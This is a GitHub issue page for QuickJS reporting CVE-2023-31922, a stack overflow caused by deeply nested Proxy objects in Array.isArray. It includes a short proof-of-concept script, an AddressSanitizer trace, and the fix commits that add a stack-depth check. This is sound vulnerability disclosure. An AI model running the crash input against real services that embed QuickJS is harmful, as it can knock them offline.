Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

AddressSanitizer: stack-overflow #178

Closed
Ye0nny opened this issue Apr 22, 2023 · 2 comments
Closed

AddressSanitizer: stack-overflow #178

Ye0nny opened this issue Apr 22, 2023 · 2 comments

Comments

@Ye0nny
Copy link

Ye0nny commented Apr 22, 2023

QuickJS Version

Version : 2788d71

platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build

  • Address Sanitizer=On
  • Debug (and Release)

PoC

testcase 

Array . isArray ( [ ] ) ; Array . isArray ( { } ) , Array . isArray ( null ) , Array . isArray ( 0 ) , Array . isArray ( 0.1 ) , Array . isArray ( " " ) , Array . isArray ( void 0 ) , Array . isArray ( new Proxy ( [ ] , { } ) ) , Array . isArray ( new Proxy ( { } , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( [ ] , { } ) , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( { } , { } ) , { } ) ) ; for ( var r = new Proxy ( [ ] , { } ) , y = 0 ; y < 131072 ; y ++ ) r = new Proxy ( r , { } ) ; Array . isArray ( r ) , RangeError ;

// poc.js
for (var r = new Proxy ([],{}) , y = 0 ; y < 131072 ; y ++ ) 
    r = new Proxy (r, {}); 
Array . isArray (r);

Execution steps & Output

The js_proxy_isArray() function and the JS_IsArray() function are calling each other recursively.
infinite loop occurs here.

$ ./qjs poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2347865==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcfb766fd8 (pc 0x557e466f5b94 bp 0x7ffcfb767110 sp 0x7ffcfb766fd8 T0)
    #0 0x557e466f5b93 in js_proxy_isArray ./quickjs/quickjs.c:45242
    #1 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #2 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #3 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #4 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #5 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    ...
    #491 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #492 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #493 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #494 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #495 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #496 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250

SUMMARY: AddressSanitizer: stack-overflow ./quickjs/quickjs.c:45242 in js_proxy_isArray
==2347865==ABORTING

Credits: @Ye0nny, @EJueon of the seclab-yonsei.
nickva added a commit to nickva/quickjs that referenced this issue May 28, 2023
@nickva
Fix stack overflow in CVE-2023-31922
0564593 
isArray and proxy isArray can call each other indefinitely in a mutually
recursive loop.

Add a stack overflow check in the js_proxy_isArray function before calling
JS_isArray(ctx, s->target).

With ASAN the the poc.js from issue 178:

```
./qjs ./poc.js
InternalError: stack overflow
  at isArray (native)
  at <eval> (./poc.js:4)
```

Fix: bellard#178
@nickva nickva mentioned this issue May 28, 2023
Closed
@nickva
Copy link
Contributor

nickva commented May 28, 2023

Wonder if this would fix the issue? #182

@Gottox Gottox mentioned this issue May 30, 2023
Merged
nickva added a commit to nickva/quickjs-ng that referenced this issue Nov 29, 2023
@nickva
Fix stack overflow in CVE-2023-31922
6ce5483 
isArray and proxy isArray can call each other indefinitely in a mutually
recursive loop.

Add a stack overflow check in the js_proxy_isArray function before calling
JS_isArray(ctx, s->target).

With ASAN the the poc.js from issue 178:

```
./qjs ./poc.js
InternalError: stack overflow
  at isArray (native)
  at <eval> (./poc.js:4)
```

Fix: bellard/quickjs#178
@nickva nickva mentioned this issue Nov 29, 2023
Merged
nickva added a commit to nickva/quickjs-ng that referenced this issue Dec 1, 2023
@nickva
Fix stack overflow in CVE-2023-31922
89dd2c2 
isArray and proxy isArray can call each other indefinitely in a mutually
recursive loop.

Add a stack overflow check in the js_proxy_isArray function before calling
JS_isArray(ctx, s->target).

With ASAN the the poc.js from issue 178:

```
./qjs ./poc.js
InternalError: stack overflow
  at isArray (native)
  at <eval> (./poc.js:4)
```

Fix: bellard/quickjs#178
nickva added a commit to nickva/quickjs-ng that referenced this issue Dec 1, 2023
@nickva
Fix stack overflow in CVE-2023-31922
2425b54 
isArray and proxy isArray can call each other indefinitely in a mutually
recursive loop.

Add a stack overflow check in the js_proxy_isArray function before calling
`JS_isArray(ctx, s->target)`.

Original issue: bellard/quickjs#178
CVE: https://nvd.nist.gov/vuln/detail/CVE-2023-31922
saghul pushed a commit to quickjs-ng/quickjs that referenced this issue Dec 1, 2023
@nickva
Fix stack overflow in CVE-2023-31922 (#157)
6b3bed1 
isArray and proxy isArray can call each other indefinitely in a mutually
recursive loop.

Add a stack overflow check in the js_proxy_isArray function before calling
`JS_isArray(ctx, s->target)`.

Original issue: bellard/quickjs#178
CVE: https://nvd.nist.gov/vuln/detail/CVE-2023-31922
bellard added a commit that referenced this issue Dec 1, 2023
@bellard
fixed js_proxy_isArray stack overflow (github issue #178)
03cc5ec
@bellard
Copy link
Owner

bellard commented Dec 1, 2023

fixed

@bellard bellard closed this as completed Dec 1, 2023
@tbrockman tbrockman mentioned this issue Dec 5, 2023
Merged
GerHobbelt pushed a commit to GerHobbelt/quickjs that referenced this issue Jan 26, 2024
@tbrockman
Update quickjs to fix CVE-2023-31922 (bellard#125)
6e8bf02 
* Squashed 'quickjs/' changes from b5e6289..f87cab0

f87cab0 added String.prototype.at, Array.prototype.at and TypedArray.prototype.at
3106401 keep LTO
cdeca4d updated to unicode 15.0.0
94010ed the BigInt support is now always included
03cc5ec fixed js_proxy_isArray stack overflow (github issue bellard#178)
6de52d8 bf_set_ui() fix (github issue bellard#133)
2788d71 updated to Unicode 14.0.0
8516959 updated test262.conf
446099a added Object.hasOwn()
b9f5880 fixed invalid Array.prototype.push/unshift optimization

git-subtree-dir: quickjs
git-subtree-split: f87cab0

* Ignore emsdk-cache in prettier (caused CI failure in my own repo: https://github.com/tbrockman/quickjs-emscripten/actions/runs/7103978144/job/19337912692).
GerHobbelt pushed a commit to GerHobbelt/quickjs that referenced this issue Jan 26, 2024
@justjake
Squashed 'quickjs/' changes from b5e6289..daa35bc
df7887a 
daa35bc new release
a057008 added Array.prototype.findLast{Index} and TypeArray.prototype.findLast{index} (initial patch by bnoordhuis)
177af41 fixed duplicate static private setter/getter test
b180cd2 Symbol.species is no longer used in TypedArray constructor from a TypedArray
e182050 fixed delete super.x error
58f374e reworked set property and fixed corner cases of typed array set property
20a57f9 Implement extended named capture group identifiers (bnoordhuis)
4949d75 Retrieve RegExp 'g' flag in spec conformant way (original patch by bnoordhuis)
c4cdd61 fixed lexical scope of 'this' with eval (github issue bellard#192)
26fdf65 Make Date methods argument coercion spec compliant (bnoordhuis)
b14d77b fixed negative zero date
55a4878 fixed private field setters (github issue bellard#194)
321dbfa added missing bignum error tests (github issue bellard#159)
f87cab0 added String.prototype.at, Array.prototype.at and TypedArray.prototype.at
3106401 keep LTO
cdeca4d updated to unicode 15.0.0
94010ed the BigInt support is now always included
03cc5ec fixed js_proxy_isArray stack overflow (github issue bellard#178)
6de52d8 bf_set_ui() fix (github issue bellard#133)
2788d71 updated to Unicode 14.0.0
8516959 updated test262.conf
446099a added Object.hasOwn()
b9f5880 fixed invalid Array.prototype.push/unshift optimization

git-subtree-dir: quickjs
git-subtree-split: daa35bc
suchipi pushed a commit to suchipi/quickjs that referenced this issue Feb 13, 2024
@bellard @suchipi
fixed js_proxy_isArray stack overflow (github issue bellard#178)
c0670c5
xplshn pushed a commit to xplshn/Mirror-of-the-Chawan-web-browser that referenced this issue Apr 9, 2024
@nickva @bptato
Fix stack overflow in CVE-2023-31922
43c0199 
isArray and proxy isArray can call each other indefinitely in a mutually
recursive loop.

Add a stack overflow check in the js_proxy_isArray function before calling
JS_isArray(ctx, s->target).

With ASAN the the poc.js from issue 178:

```
./qjs ./poc.js
InternalError: stack overflow
  at isArray (native)
  at <eval> (./poc.js:4)
```

Fix: bellard/quickjs#178
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Fix stack overflow in CVE-2023-31922 nickva/quickjs
3 participants
@nickva @bellard @Ye0nny